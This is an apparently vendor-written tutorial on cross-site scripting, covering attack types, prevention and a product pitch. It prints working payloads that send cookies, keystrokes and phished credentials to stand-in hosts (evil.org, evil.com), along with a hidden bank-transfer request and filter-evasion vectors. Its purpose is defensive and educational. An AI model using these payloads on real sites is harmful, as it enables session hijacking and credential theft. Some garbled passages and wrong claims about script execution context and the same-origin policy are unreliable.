What is a cross-site scripting (XSS) attack?

With the world switching to remote work on a scale never seen previously, cybercriminals have become more active than ever. Security at many organizations has suffered since workers have started working from insecure home networks and using their own (possibly infected) personal computers. As a result, the potential danger from the most frequent attack vectors can hardly be overestimated.

Our research shows that for years now, XSS vulnerabilities have consistently taken first place in terms of prevalence online. In this article, we discuss the potential dangers and prevention of XSS cyberattacks.

Definition

Cross-site scripting, often abbreviated as XSS, is a type of attack in which malicious scripts are injected into websites and web applications for the purpose of running on the end user's device. During this process, unsanitized or unvalidated inputs (user-entered data) are used to change outputs.

Some XSS attacks do not have a specific target; the attacker simply exploits a vulnerability in the application or site, taking advantage of anyone unlucky enough to fall victim. But in many cases, XSS is performed in a more direct way, such as in an email message. An XSS attack can turn a web application or website into a vector for delivering malicious scripts to the web browsers of unsuspecting victims.

XSS attacks can exploit vulnerabilities in a range of programming environments, including VBScript, Flash, ActiveX, and JavaScript. Most often, XSS targets JavaScript because of the language's tight integration with most browsers. This ability to exploit commonly used platforms makes XSS attacks both dangerous and common.

How cross-site scripting works

Armed with this idea of what a cross-site scripting attack is, let's see how it works.

Imagine a person sitting at a computer. The screen shows a file manager, text editor, spreadsheet, and music player icon in the lower-right corner. All is ordinary and familiar so far. But something is missing from this picture—an Internet browser with dozens of tabs open simultaneously.

These tabs are filled with interesting headlines, funny videos, ads for sporting goods, online stores, and a payment site with a just-paid receipt for a speeding ticket. All of these sites have one thing in common: they would hardly be possible without JavaScript.

Then a simple click on an advertising banner triggers another page. The page contains a script that connects to an online banking site and quietly transfers money from the user's account to the attacker's card. Rather unpleasant, to put it mildly. Fortunately, browsers eliminate this possibility thanks to the same-origin policy (SOP). This policy ensures that the scripts executed on a web page don't have access to the wrong data. If scripts have been loaded from a different domain, the browser won't be able to run them.

Does this guarantee a happy ending?

If it did, this article wouldn't exist. Cybercriminals use various methods to bypass the SOP and exploit application vulnerabilities. When successful, they make the user's browser execute an arbitrary script on a given page.

Making an attack to infect a website

The same-origin policy is supposed to allow scripts only when a script is loaded from the same domain as the page that the user is currently viewing. And in reality, attackers don't have direct access to the server responsible for the page displayed by the browser. So how do attackers do it?

Application vulnerabilities can help attackers by enabling them to embed fragments and malicious code in page content.

For example, a typical search engine echoes the user's query when displaying search results. What if the user tries to find the string "<script> alert (1) </script>"? Will the contents of the search results page lead to this script being executed, and will a dialog box with the message "1" appear? This depends on how well the web application developers verify user input and transform it into a safe format.

The main difficulty lies in the fact that users run a wide variety of browser versions, from the latest pre-alphas to ones that are no longer supported. Every browser handles web pages in a slightly different way. In some cases, an XSS attack can be quite successful when inputs are not sufficiently filtered. So the first step in an XSS attack is to determine how to embed user data on a web page.

Infected website attacks users

The second step is for the attacker to convince the user to visit a specific page. The attacker also needs to pass the attack vector to the page. Once again, there is nothing here that poses a serious obstacle. Websites often accept data as part of a URL. To implement the attack vector, attackers can use various social engineering or phishing methods.

The following example code displays just such a string (passed by the user in the HTTP request) in the server's response:

    
protected void doGet(HttpServletRequest request, HttpServletResponse resp) { String firstName = request.getParameter("firstName"); resp.getWriter().append("<div>"); resp.getWriter().append("Search for " + firstName); resp.getWriter().append("</div>"); }

The code processes the value of the first URL parameter passed in the user's request. Then it displays the parameter on the resulting web page. The developer seemingly doesn't expect to see anything other than plain text without HTML tags in the firstName parameter. If the attacker sends the request "http://very.good.site/search?firstName= <script> alert ( 1) </script>", the final page will look as follows:

    
<div> Search for <script>alert(1)</script> </div>

You can easily check that when this HTML fragment is loaded onto a web page in the user's browser, the script passed in the firstName URL parameter is executed. In this case, malicious JavaScript is executed in the context of the vulnerable server. The script can therefore access the domain's cookie data, its API, and more. Of course, the attacker will develop the actual vector in a way that conceals their presence on the user-viewed page.

Statistics and analytics

According to Positive Technologies analytics, XSS is among the three most common web application attacks. The relative percentage of XSS compared to other attack types has dipped in previous years. Still, there is no sign of XSS losing popularity.

Why is XSS still near the top of the list? Consider the number of vulnerable websites. As detailed in our 2019 report, more than two-thirds of tested websites had XSS vulnerabilities.

Sectors most commonly targeted by XSS are hospitality and entertainment (33%), finance (29%), education and science (29%), and transportation (26%). IT (16%) and government (16%) are also impacted, but not to the same extent.

Types of cross-site scripting attacks

Most XSS attacks can be divided into three categories:

  • Reflected (non-persistent). The carrier of the attack vector is the current client HTTP request. The server returns a response containing the attack vector. In essence, the server reflects the attack.
  • Stored (persistent). The attack vector is located on the server side. (We will talk about how exactly it gets there a bit later in this article.)
  • DOM-based XSS (Document Object Model). The attack vector is on the client side. Exploitation is possible primarily due to flaws in data processing inside JavaScript code.

A few other categories exist as well, although they are seen less frequently. They include:

  • Flash-based XSS. This vulnerability comes from insufficient processing of user input in Flash applications.
  • XSSI. Resources that are hosted on external domains and servers are vulnerable.

Browser vulnerabilities can also contribute to XSS risks, for example:

  • uXSS (Universal XSS). This vulnerability allows bypassing the SOP to execute JavaScript from one site on another.
  • mXSS (Mutation XSS). Attackers bypass filtering by putting an HTML payload into the DOM with "JavaScript ([element] .innerHTML =% value%" or "document.write (% value%))" in order to change it from safe to potentially dangerous.

Reflected (non-persistent) XSS

In reflected XSS, the attack vector is inside the HTTP client request processed by the server. If the server's request and response are semantically related, the server's response is formed from the request data. For example, the request could be a search query and the response might be the results page.

Reflected XSS occurs if the server does a poor job of processing HTML escape sequences. In this case, the page as displayed on the server side will cause JavaScript to be executed in the context of the server, which is part of the original attack vector.

Example of reflected (non-persistent) XSS

Here is an example of thecode vulnerable code below.to reflected XSS:

    
protected void info(HttpServletResponse resp, String info) { resp.getWriter().append("<h4>Info</h4>"); resp.getWriter().append(info); }

Stored (persistent) XSS

This type of application vulnerability occurs when a attack vector contains JavaScript that doesn't come in a user request. Instead, the JavaScript code is downloaded from the server (such as the database or file system).

The application might allow you to save data from an untrusted source and, subsequently, use this data to generate a server response to a client's request. Paired with poor handling of HTML escape sequences, this presents an opportunity for a stored XSS attack.

Imagine an online forum where people communicate regularly. If the application is vulnerable, an attacker can post a message with embedded JavaScript. The message will be saved in the system database. After that, the script in question will be executed by all users who read the message posted by the attacker.

Example of stored (persistent) XSS

An example of code for exploitation of stored XSS vulnerabilities:

    
protected void doGet(HttpServletRequest rq, HttpServletResponse resp) { String name = rq.getParameter("NAME"); StringBuffer res = new StringBuffer(); String query = "SELECT fullname FROM emp WHERE name = '" + name + "'"; ResultSet rs = DB.createStatement().executeQuery(query); res.append("<table class=\"table\"><tr><th>Employee</th></tr>"); while (rs.next()) { res.append("<tr><td>"); res.append(rs.getString("fullname")); res.append("</td></tr>"); } res.append("</table>"); resp.getWriter().append(res.toString()); }

Here, data is read from the database and the results are passed along without client verification. If the data stored in the database contains HTML escape sequences, including JavaScript, the data will be passed to the client and executed by the browser in the context of the web application.

DOM-based attacks

The two types of XSS vulnerabilities described above have something in common: the web page with embedded JavaScript is formed on the server side. However, the client frameworks used in modern web applications allow changing a web page without accessing the server. The document object model can be modified directly on the client side.

The main premise behind this vulnerability remains the same: specifically, poorly implemented processing of HTML escape sequences. This leads to attacker-controlled JavaScript appearing in the text of a web page. Then this code is executed in the server context.

Example of DOM-based attacks

Here is code for exploiting this type of vulnerability:

    
<div id="message-text">This is a warning alert</div>

The HTML code has an element with the "message-text" identifier, meaning that it is used to display the text of a message. The DOM tree is then modified by the following JavaScript function:

    
function warning(message) { $("#message-text").html(message); $("#message").prop('style', 'display:inherit'); }

The script displays the message with the html() function, which doesn't sanitize HTML escape sequences. Therefore, such an implementation is vulnerable. For example, the following could be passed to this function:

<script> alert ("XSS") </script>

In this case, the script will be executed in the server context.

Cross-site scripting (XSS) examples

Before we go into specific examples, we should also point out an important distinction. Some XSS attacks are aimed at acquiring information only once. In these cases, the victim computer executes a malicious script and sends stolen information to an attacker-controlled server.

Other attacks, however, focus on repeated exploits by:

  • Hijacking a user session and logging in to the account to collect information.
  • Phishing and logging in to an account with the username and password.
  • Changing the password of the victim. This is possible when the application allows changing or resetting passwords without having to enter the old password (or a one-time code).
  • Creating a new privileged user, when the victim has the rights to do so.
  • Implanting a JavaScript backdoor. For this, the victim needs to have rights to edit page content. This could also involve stored XSS on frequently visited pages, if the victim has the necessary rights.
  • Application attacks by leveraging the victim's rights have targeted WordPress (remote code execution [RCE] through the template/plugin editor in the admin panel) and Joomla (RCE through download of arbitrary files).

As we have seen, XSS allows executing JavaScript in the context of a vulnerable web application. But unlike SQLi, XXE, AFR, and others, JavaScript scripts are executed in the end user's web browser. The primary goal of an XSS attack is to access the user's resources. Let's look at a few examples of such attacks.

1. Session hijacking

Imagine the following scenario. A user opens a browser and goes to an online banking page. The user is prompted to log in with their username and password. Obviously, the user's subsequent actions should then be regarded as legitimate. But how do you verify this legitimacy without asking the user to log in after every single click?

Fortunately for users, there is a way of doing that. After successful authentication, the server generates a string that uniquely identifies the current user session. This string is passed in a response header, in the form of cookie data. The following screenshot shows an example of a server response in which the session cookie is called JSESSIONID:

On subsequent visits to the server, the cookie data will be automatically included in the request. This data will be used by the server to determine whether the request comes from a legitimate user. Naturally, the security of session cookies then becomes critical. Any interception of this information would enable impersonating a legitimate user.

One of the classic ways to transfer session cookie data to an attacker is to send an HTTP request from the user's web browser to an attacker-controlled server. In this case, the request is generated by JavaScript that is embedded on a vulnerable web page. The cookie data is then transmitted in the parameters of this request. One example of an attack vector could be the following:

    
<script>new Image().src="http://evil.org/do?data="+document.cookie;</script>

In this example, the user's web browser creates an image object in the DOM model. After that, it tries to load the image from the address specified in the src tag. The browser then sends the cookie data to the attacker's site with the corresponding HTTP request handler:

    
@GetMapping(value = "/do", produces = MediaType.IMAGE_PNG_VALUE) public @ResponseBody byte[] getImage(@RequestParam(name = "data") String data) throws IOException { log.info("Document.cookie = {}", data); InputStream in = getClass().getResourceAsStream("/images/1x1.png"); return IOUtils.toByteArray(in); }

In this case, an attacker only needs to listen to incoming connections, or else configure event logs and obtain cookie data from the log files (this is described later in more detail).

Later on, an attacker can use session cookie data in their own requests to impersonate the user.

2. Impersonating the current user

JavaScript is a very capable programming language. An attacker can use these abilities, combined with XSS vulnerabilities, simultaneously as part of an attack vector. So instead of XSS being a way just to obtain critical user data, it can also be a way to conduct an attack directly from the user's browser.

For example, XMLHttpRequest objects are used to generate HTTP requests to web application resources. Such requests may include generating and submitting HTML forms via POST requests, which are automatic and often invisible. These requests can be used to send comments or to conduct financial transactions:

    
<script> var req = new XMLHttpRequest(); req.open('POST','http://bank.org/transfer',true); req.setRequestHeader('Content-type','application/x-www-form-urlencoded'); req.send('from=A&to=B&amount=1000'); </script>

By exploiting an XSS vulnerability with this attack vector, malicious actors can transfer any specified amount of money to their accounts.

3. Phishing attacks

As noted already, XSS can be used to embed JavaScript scripts that modify the DOM model in a web page. This allows an attacker to change how the website appears to the user, such as by creating fake input forms. If a vulnerable web application permits modifications to the DOM model, an attacker could inject a fake authentication form into the web page by using the following attack vector:

    
<h3>Please login to proceed</h3><form action="http://evil.org/login" method="post">Username:<br><input type="username" name="username"></br>Password:<br><input type="password" name="password"></br><br><input type="submit" value="Logon">

The following form will be displayedthen appears on the web page:

Any credentials that a user enters in this form will be sent as a POST request to the evil.org attacker website:

4. Capture keystrokes

Opportunities for exploiting XSS vulnerabilities are not limited to executable scripts. If an attacker has an Internet server, malicious scripts can be loaded directly from it. An attacker could deploy the following script to capture keystrokes:

    
var buffer = []; var evilSite = 'http://evil.org/keys?data=' document.onkeypress = function(e) { var timestamp = Date.now() | 0; var stroke = { k: e.key, t: timestamp }; buffer.push(stroke); } window.setInterval(function() { if (0 == buffer.length) return; var data = encodeURIComponent(JSON.stringify(buffer)); new Image().src = evilSite + data; buffer = []; }, 600);

The script here implements a keystroke interceptor that saves the corresponding character and timestamp to the internal buffer. It also implements a function that sends data stored in the buffer twice per second to the evil.org attacker server.

In order to embed this keylogger script on a target web page, actors can use the following attack vector:

    
<script src="http://evil.org/js?name=keystrokes">

After the exploit is triggered, the user's keystrokes on the web page will be redirected to the attacker server:

The screenshot shows entries from the event log on the attacker server. In this example, the user has typed "James" on the keyboard. These records show keystrokes presented in JSON format: the field "k" contains a character and the field "t" contains the corresponding timestamp.

What are the consequences of XSS attacks?

From these examples and attack vectors, it is clear that a successful XSS attack on a vulnerable web application gives attackers a very powerful tool. With XSS, attackers have the capability to:

  • Read any data and perform arbitrary actions by impersonating the user. Such actions may include posting on social media or conducting banking transactions.
  • Intercept user input.
  • Deface web pages.
  • Inject malicious code into web pages. Such functionality may be reminiscent of Trojans, including fake forms for entering credentials or paying for online orders.

Cross-site scripting attacks can also be leveraged for financial benefit in more indirect ways. For example, severe XSS attacks can be used to embed advertising information or manipulate Internet ratings through DOM modification.

Risk levels of XSS vulnerabilities

Impact typically depends on the type of XSS vulnerability (for example, stored or reflected), difficulty of implementation, and whether it requires authentication (perhaps not everybody has access to the page in question).

Other factors include what, if any, additional actions are required from the user; whether the attack is triggered reliably; and what exactly could a potential attacker gain. If the site does not contain private information (because of there being no authentication or distinction between users), then the impact is minimal.

The Positive Technologies Security Threatscape divides XSS into three categories:

  • Low. Vulnerabilities on routers or other local devices requiring authorization. XSS here requires privileged user rights, or, roughly speaking, self-XSS. Since the difficulty of an attack is relatively high, the resulting impact is small.
  • Medium. Here we refer to all reflected and stored XSS attacks that require visiting a certain page (social engineering). This is more critical and has a greater impact, since stored XSS is easier for attackers. But because the user must still log in first, the criticality is not so high.
  • High. In this case, the user independently visits a page that contains a malicious script. Some examples are XSS in a personal message, a blog comment, or an admin panel that appears immediately after login (in the user list via username or in logs through useragent).

A website might have stored XSS, resulting in High impact. However, if you need a certain level of access to visit that site, then the impact is reduced to Medium.

It's also important to mention that in any case, impact depends on the author's assessment of criticality—researchers have their own viewpoints. XSS vulnerabilities can be of high severity, but typically they receive scores below those given to other types of attacks.

Examples of vulnerabilities

The following examples come from Positive Research or automated detections by Positive Technologies security products such as MaxPatrol and PT Application Inspector. Severity levels are those valid as of the vulnerability publication date.

  • Advantech WebAccess: CVE-2015-3948
  • Severity level: Low
  • Advantech WebAccess versions prior to 8.1 allow remote injection of arbitrary web scripts or HTML through authenticated users. As a result, attackers can obtain sensitive information.
PT-2016-02: Cross-Site Scripting in Advantech WebAccess
  • SAP NetWeaver Development Infrastructure Cockpit: CVE: not assigned
  • Severity level: Medium
  • A vulnerability was detected in the nwdicockpit/srv/data/userprefs component of SAP NetWeaver Development Infrastructure Cockpit, by means of which malicious code could be injected into a victim's browser and executed.
PT-2018-40: Stored XSS in SAP NetWeaver Development Infrastructure Cockpit

Wonderware Information Server: CVE-2013-0688

Severity level: High

A vulnerability in Wonderware Information Server allows attackers to inject arbitrary code into a web page viewed by other users or to bypass client-side security in web browsers. The attack can be initiated remotely and no authentication is required for successful exploitation.

PT-2013-37: Multiple Cross-Site Scripting (XSS) in Wonderware Information Server

Detecting and testing for XSS

The best way to test your own application, or one for which you have source code, is by combining manual and automated techniques. Static code analysis should be able to detect a number of XSS vulnerabilities.

How well detection works depends heavily on the scanner. Different scanners vary in vectors and techniques, so some will be more reliable than others, and none of them will be perfect. For example, there is a chance that a manual tester will be able to find issues that a black-box scanner missed. If you want to ramp up automation test coverage, you could implement a gray-/white-box solution to accommodate the black-box approach.

Another hazard to bear in mind is the possibility of false positives. Combining techniques and tools will improve the outcome, but certain issues will still take manual work to identify.

Here is a video from our colleague with an example. This particular case involves vulnerabilities in the Acorn JavaScript parser. Many other parsers have this vulnerability as well.

Any XSS vulnerability analyzer requires JavaScript and HTML inputs. If the parser can't recognize the JavaScript code in any part of the page, then this code will not be correctly passed to the analyzer. This means that by tricking the parser, it is possible to make a successful XSS attack that bypasses the scanner entirely.

The specific code that is not recognized by the Acorn parser (as of the time of the video's release) is presented below.

Tag Attribute Injection <img>:

<img bar="entry"> where entry equals ><svg/onload='alert(1)'onLoad="alert(1);//

Function Injection:

<body onload="think.oob(entry)"> where entry equals )}.{0:promt(1

In both cases, the program did not find potential XSS vulnerabilities in the code. We can conclude that manual testing is likely the most effective method—as long you know what you're doing.

Testing is not limited to just injecting "<script>alert('hi')</script>" into a text box. Trial and error are unavoidable. But if you inject code, check the resulting HTML page, and see what happens after you change the vector, you are sure to find things.

You can cover many potential attack vectors by following a similar pattern:

1. Start by looking for places with no special character filtering (> <"'). BurpSuite or Acunetix can automate this process. After automatic verification, make sure to manually check filtering on any form of text input.

2. The next step is analyzing the JavaScript code of the project. BlueClosure can automatically test the entire frontend. After eliminating vulnerabilities that can be found automatically, pay special attention to where the application displays user input and where it's passed to the server (and subsequently being saved to the database).

3. Then consider not only the JavaScript code, but all parts of the system as a whole. For example, some elements involve turning user input data into links or other hypertext elements. Embedding a link like "javascript: alert (1)" in a website field in a user profile is a very frequent vector in successful attacks. Any parser that converts text to HTML potentially opens the door to malicious code.

Pay special attention to the following elements:

  • Markdown editors that allow users to add custom HTML markup (including malicious JavaScript) to forum posts
  • Text-to-emoji converters that can be tricked into producing an infected element
  • URL and email converters that turn text into a link
  • Text-to-picture converters and the ability to set profile pictures hosted on third-party resources

Most common attack vectors

To get a better understanding of XSS vulnerabilities, let's analyze each of the major threat vectors.

<script> tag

This one is a relatively simple XSS script. It can be placed as an external script reference (external payload) or embedded within the script tag itself.

    
<!-- External script --> <script src=http://evil.com/xss.js></script> <!-- Embedded script --> <script> alert("XSS"); </script>

JavaScript events

Another commonly used vector is onload/onerror events. These are embedded in many different tags.

    
<!-- onload attribute in the <body> tag --> <body onload=alert("XSS")>

<body> tag

An attack can be delivered within the <body> tag either through JavaScript events, as described earlier, or tag attributes that can be similarly exploited.

    
<!-- background attribute --> <body background="javascript:alert("XSS")">

<img> tag

Browsers can also run JavaScript code associated with the <img> tag.

    
<!-- <img> tag XSS --> <img src="javascript:alert("XSS");"> tag XSS using lesser-known attributes --> <img dynsrc="javascript:alert('XSS')"> <img lowsrc="javascript:alert('XSS')">

<input> tag

The <input> tag can be manipulated if it has "image" in its type attribute.

    
<!-- <input> tag XSS --> <input type="image" src="javascript:alert('XSS');">

<div> tag

The <div> tag supports embedded scripts, which can be exploited by attackers.

    
<!-- <div> tag XSS --> <div style="background-image: url(javascript:alert('XSS'))"> <!-- <div> tag XSS --> <div style="width: expression(alert('XSS'));">

This list is not comprehensive. For a full one, we recommend checking out the XSS Filter Evasion Cheat Sheet by OWASP.

XSS testing tools

A rough classification of XSS testing solutions is as follows:

  • Multicomponent scanners covering multiple vulnerability types vs standalone XSS scanners
  • Free and open-source vs enterprise solutions

Standalone scanners are mostly self-written by pentesters, who adjust them as needed. Most XSS testing tools are a part of larger, more comprehensive vulnerability scanners.

Let's see how open-source and enterprise solutions stack up against each other.

 

Open-source tools

Enterprise tools

Advantages

  • Free
  • Usually have a narrow focus, but do the job well
  • Wide variety to choose from: you can use many simultaneously
  • Overall smooth process
  • Usually offered as an all-in-one software package
  • Easily integrated with other solutions from the same vendor
  • Vendor support and clear documentation
  • Regular updates

Disadvantages

  • Low to medium quality in most cases
  • No centralized support
  • May integrate poorly (or not at all) with other security tools
  • Price can be high
  • Large scanners may be cumbersome and have more false positives

Research shows that most vulnerabilities are caused by errors in source code. Therefore, it is important that your cybersecurity arsenal include a comprehensive source code analysis solution, such as PT Application Inspector. This is an enterprise solution that combines static, dynamic, and interactive approaches to make testing robust and thorough.

For a more detailed look at how PT AI performs in practice, we've prepared a quick rundown of its capabilities at the end of this article.

XSS attack prevention and mitigation

From a technical point of view, XSS is an injection-class vulnerability, in which the attacker manipulates the logic of the web application in a browser. So to prevent such vulnerabilities, one needs to thoroughly check any data that enters the application from the outside. To do so, the application must implement a number of approaches, which we describe here.

Force inputs to the same data type

User input is initially presented in string form. This data should be transformed into objects of a specified type. This functionality is often implemented at the framework level, so that the action is transparent to the user. One such transparent process takes place in the following Java code:

    
@GetMapping(value = "/result") public void getJobResult( @RequestParam(name = "scan-id") Integer scanId, @RequestParam(name = "artifact") String artifact, HttpServletResponse response) throws ServiceUnavailableException { // Real controller code skipped

This example shows the declaration of an HTTP GET request handler. It's accessible at the relative path "/result" and takes two required parameters as input: integer scan-id and string artifact. During initial processing of the request, the framework performs the actions needed to determine the correctness of the inputs.

In the event of a type mismatch, the requesting party sees an error message even before control transfers to the application code. This would happen if, for instance, a scan-id parameter contains a non-numeric value.

Input validation

During validation, input data is checked against both grammatical and semantic criteria. The user's year of birth, say, can be checked for grammar with the regular expression "^[0-9]{4}$". This expression verifies that the string truly consists of four (and only four) digits. Once the string is converted to a number, we then need to check semantics: the year of birth should not be 1000 or 9876.

It also makes sense to apply allowlist and blocklist validation. For a blocklist, you need to define certain patterns that shouldn't be found in the input data.

However, blocklist approaches have a number of serious disadvantages. Patterns tend to be needlessly complex and become obsolete quickly. Creating patterns to cover all possible permutations of malicious data is far from easy. Developers will inevitably find themselves struggling to catch up with attackers. This is why it is more efficient to apply an allowlist that defines rules with which input data must comply.

Output sanitization

Regardless of how well (or not) the previous two techniques are implemented, the key action for preventing XSS is to check and convert output data. It is important to ensure that untrusted data cannot be passed to an HTML document. The exceptions are certain contexts in which the data still needs to follow certain rules. These rules must ensure that the web browser treats the output as data, not as code. These contexts include:

Context

Method/property

Content of HTML element

<div>userData</div>

Value attribute of HTML element

<input value="userData">

Value in JavaScript

var name="userData";

Value of URL request parameter

http://site.org/?param=userData

Value in CSS

color:userData

For each of these contexts, you should apply individual verification and conversion rules. For the content of an HTML element (such as inside <div>, <p>, <b>, <td>, and similar tags), XML and HTML special characters should be replaced with safe variants. Replace "&" with "&amp", "<" with "&lt;", ">" with "&gt;", double quotes with "&quot;", and single quotes with "«&#x27;".

The "/" character, which can close HTML tags, is replaced by "&#x2F;". For example, when using the StringEscapeUtils.escapeHtml4 function from the Apache Commons Text library on the server side, user-entered data is made safe like so:

String data = "<script>alert(1)</script>";

String safeData = StringEscapeUtils.escapeHtml4(data);

The result of the conversion will be the string "&lt;script&gt;alert(1)&lt;/script&gt;", which will not be parsed by the browser as an HTML escape sequence.

The LibProtection library allows automatically determining context and sanitizing data. In addition, the library can signal when input data contains an attack vector.

For example, the following code fragment contains three points at which user data can be embedded:

  • Value attribute of HTML element (a)
  • Value of JavaScript parameter (b)
  • Content of HTML element (c)
    
Response.Write($"<a href='{a}' onclick='alert("{b}");return false'>{c}</a>");

Let's assume that the attacker has passed the following variables as input:

    
a = 'onmouseover='alert(`XSS`) b = ");alert(`XSS`) c = <script>alert(`XSS`)</script>

If we do not check the input, the response will look like this:

    
<a href=''onmouseover='alert(`XSS`)' onclick='alert("");alert(`XSS`)");return false'><script>alert(`XSS`)</script></a>

Thus an attacker can perform an XSS attack in three different ways. LibProtection converts data, determining the context and applying rules in a way transparent to the developer:

    
Response.Write(SafeString.Format<Html>($"<a href='{a}' onclick='alert("{b}");return false'>{c}</a>"));

The resulting string is converted to:

    
<a href='%27onmouseover%3d%27alert(%60XSS%60)' onclick='alert("\&quot;);alert(`XSS`)");return false'>&lt;script&gt;alert(`XSS`)&lt;/script&gt;</a>

LibProtection supports C #, Java, and C ++ and allows sanitizing inputs against other types of attacks. This protection extends to SQL injection and vulnerabilities based on improper handling of URLs and path directories.

Client- and server-side sanitization

Data can be sanitized in different ways based on the application architecture and programming languages used. Because technologies and languages can be so different, it is hard to recommend one single way for checking on the server side. But since JavaScript has become the de facto standard on the client side, we can still try to formulate universal principles for a number of contexts:

Context

Method/property

Content of HTML element

<div>userData</div>

Value attribute of HTML element

<input value="userData">

Value in JavaScript

var name="userData";

Value of URL request parameter

http://site.org/?param=userData

Value in CSS

color:userData

All sanitizing algorithms have limitations. For instance, even if you apply rules to sanitize the href HTML attribute, an attacker can still pass URL values that start with "javascript:".

Additional XSS prevention measures

Checking inputs and outputs is the main way to protect against XSS attacks—but not the only one. You should also consider:

  • Standardization at the header level of Content-Type and X-Content-Type-Options. Ensure that the server response type is not "text / html" and prevent the browser from automatically detecting the data type (X-Content-Type-Options: nosniff).
  • Use of a Content Security Policy (CSP) to minimize negative consequences when malicious code is injected.

XSS cheat sheet

This cheat sheet provides guidance against a huge number of XSS attack vectors. Even just basic rules will be enough to stop the majority of attacks. Here are the most important ones:

  • Deny all untrusted data unless it's inserted in allowed locations.
  • Use HTML escaping before putting untrusted data into the HTML body.
  • Use escaping in HTML attributes before adding untrusted data into HTML common attributes.
  • Escape JavaScript before putting untrusted data inside data values.
  • Escape CSS before inserting untrusted data into HTML style property values.
  • Escape URLs before passing untrusted data to HTML URL parameter values.
  • Use a library to parse and sanitize HTML formatted text.

Since XSS can be used to infiltrate a website and attack users in many ways, it's important to approach security from multiple perspectives. Developers need to receive training on secure coding and best practices. Scan the codebase as early and frequently as possible to detect potential flaws and breaches. Pay special attention to accounts that have administrative privileges and the ability to modify page contents. To get a better angle on website security, refer to trustworthy sources like the OWASP Cheat Sheet.

FAQ

What is an XSS payload?

A payload is an attack vector used to exploit a vulnerability. If there are vulnerabilities in code, the input data sent by the attacker may be incorrectly used by the application to modify the application's logic. In the case of XSS, the payload contains JavaScript instructions that are used by an attacker to modify client-side browser logic.

What is XSS filtering?

XSS filtering blocks the exploits used in XSS attacks. During filtering, data goes through checking, standardization (casting from a string to an object of a given type), and syntax and semantics verification. After the data is processed, it's sanitized and checked for correctness. This prevents the output from being interpreted as JavaScript by the browser.

What is an XSS polyglot?

As noted in the section on sanitization, principles for validating input data vary depending on the context in which this data is used. The attack vector to exploit XSS vulnerabilities is formed with this context in mind as well. An XSS polyglot is a complex attack vector targeted for use in several contexts at once, such as in a URL, the content of an HTML element, and JavaScript.

What are the dangers of XSS?

The main danger of XSS lies in the fact that it can grant a malicious actor nearly the same capabilities as the target. XSS, if successful, allows performing all of the actions in a web application that are available to the user. These include performing financial transactions and sending messages. XSS can be used to capture keystrokes on the user's keyboard and transmit them to an attacker. This gives malicious actors ample opportunity for follow-on attacks.

What is the difference between XSS and SQL injection?

The main difference is that the target in XSS is the end user, while SQL injection modifies the logic of database queries on the server side.

What is the difference between XSS and CSRF?

Cross-site request forgery (CSRF) is a type of attack in which a malicious actor aims to execute a specific URL request on the client side. This could mean changing passwords or performing transactions. But with successful XSS exploitation, attackers can do much more by executing an arbitrary client-side JavaScript script. Since the attacker can impersonate the client when executing requests, XSS has greater potential for harm.

What is the difference between XSS and XSSI?

XSSI vulnerabilities take advantage of the same-origin policy, which determines whether documents, resources, and scripts located on different sources can interact with each other. This policy does not at all limit the use of scripts; an attacker's webpage can be linked to a script on the victim's website. In this case, there is a possibility that this script is generated dynamically and stores critical information. When a user accesses the attacker's site, this information becomes available to the attacker.

PT AI XSS testing tool

XSS is an injection vulnerability in which input (containing the attack vector) can affect execution logic in potentially dangerous functions. Instrumental analysis of application code is one of the best options for detection. Positive Technologies Application Inspector (PT AI) is a product that helps to search for vulnerabilities in application source code using multiple advanced techniques.

The following screenshot shows how a detected XSS vulnerability looks in PT AI:

PT AI detects vulnerabilities and creates exploits for verification. Additionally, it helps you to process results in convenient ways, including an interactive data flow diagram that visually demonstrates how exploitation of a vulnerability can occur.

  • The data flow diagram in the following screenshot shows the entry point. In this case, it's represented by the standard doGet Java servlet handler. Below it are:
  • The taint entry point, where the value of the NAME parameter from the request is read.
  • A potentially dangerous function for returning the response in HTML.
  • All intermediate stages involving data handling.

This approach also works against stored XSS. In this case, code fragments are regarded as entry points for untrusted data read from sources located on the server side, such as from a database or file system.

The following screenshot demonstrates this case precisely. Line 93 is the taint entry point, where data is read from the "cname" column:

Pros of PT AI:

  • Performs complete analysis with low rate of false positives.
  • Can be integrated into development cycle via CI/CD infrastructure.
  • Supports static, interactive, and dynamic analysis.
  • Finds real and potential vulnerabilities.
  • Able to automatically generate exploits.
  • Analyzes configuration files for web servers and application servers

Cons:

  • Works only on Windows.